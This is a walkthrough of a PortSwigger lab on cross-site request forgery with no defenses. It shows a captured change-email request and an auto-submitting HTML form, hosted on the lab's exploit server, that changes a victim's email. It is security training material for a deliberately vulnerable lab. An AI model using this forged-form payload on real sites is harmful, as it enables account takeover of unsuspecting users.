[This lab](https://portswigger.net/web-security/csrf/lab-no-defenses) demonstrates a classic **CSRF (Cross-Site Request Forgery)** vulnerability where an authenticated user can be tricked into submitting a forged `POST` request via a malicious page. With **no anti-CSRF token or SameSite protection**, this is easily exploitable using an auto-submitting HTML form. #### Step 1: Log In and Capture the Request 1. In Burp’s browser, log in as: ``` Username: wiener Password: peter ``` 2. Go to **My Account → Change Email** 3. Submit a new email (e.g., `[email protected]`) 4. In **Proxy → HTTP history**, find the `POST /my-account/change-email` request: ```http POST /my-account/change-email HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Cookie: session=... [email protected] ``` --- #### Step 2: Build the Exploit HTML Generate CSRF PoC and use this part: ![[CleanShot 2025-04-18 at 18.40.23 1.png]] Or use this template: ```html <form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="[email protected]"> </form> <script> document.forms[0].submit(); </script> ``` Replace `YOUR-LAB-ID` with the actual domain of the lab. ✅ Make sure `[email protected]` is **not the email you used while testing** (or it will fail with "email already in use"). --- #### Step 3: Upload and Test the Exploit 1. Go to the **Exploit Server** 2. Paste the above HTML into the **"Body"** field 3. Click **"Store"** 4. Click **"View exploit"** to test it on your own session (you should see your email changed) --- #### Step 4: Deliver to Victim 1. Edit the email in the payload to something unique like `[email protected]` 2. Click **"Deliver to victim"** ✅ Lab will show **"Solved"** once the victim has loaded the CSRF page and had their email changed.